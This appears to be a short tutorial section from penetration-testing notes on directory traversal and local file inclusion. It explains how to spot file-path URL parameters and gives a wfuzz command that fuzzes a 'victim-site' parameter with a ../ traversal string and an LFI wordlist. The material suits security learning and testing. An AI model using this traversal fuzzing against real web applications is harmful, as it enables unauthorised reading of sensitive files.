We cover directory traversal attacks in this section, attempting to leak sensitive information from a web application target by providing arbitrary file paths into URL parameters, HTML forms, etc.
Suggestive parameters
Suggestive parameters are just keywords we should be on the lookout for when
enumerating a web application. During GET requests, if the endpoint we’re
targeting is something like:
GET /search/ HTTP/1.1
we might be able to provide arbitrary file paths and discover files on the host. Another example would be data parameters provided for HTTP methods:
GET /site/victim/lookup?file=<FILE_PATH> HTTP/1.1.
where file is a parameter we can use to provide arbitrary paths.
Fuzzing
Similar to what we covered here,
we can fuzz suspected directory traversal vulnerabilities for valid files using
wfuzz and wordlists. An example usage looks like:
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://victim-site/files?path=../../../../../../../../../../FUZZ"Where we’re using the SecLists
wordlist, also discussed here, to fuzz the victim web application
for local file inclusion (LFI) vulnerabilities. If we know the length of a bad
response from the web application vs. a good response, we can filter out bad
responses using the --hh <length> parameter for wfuzz.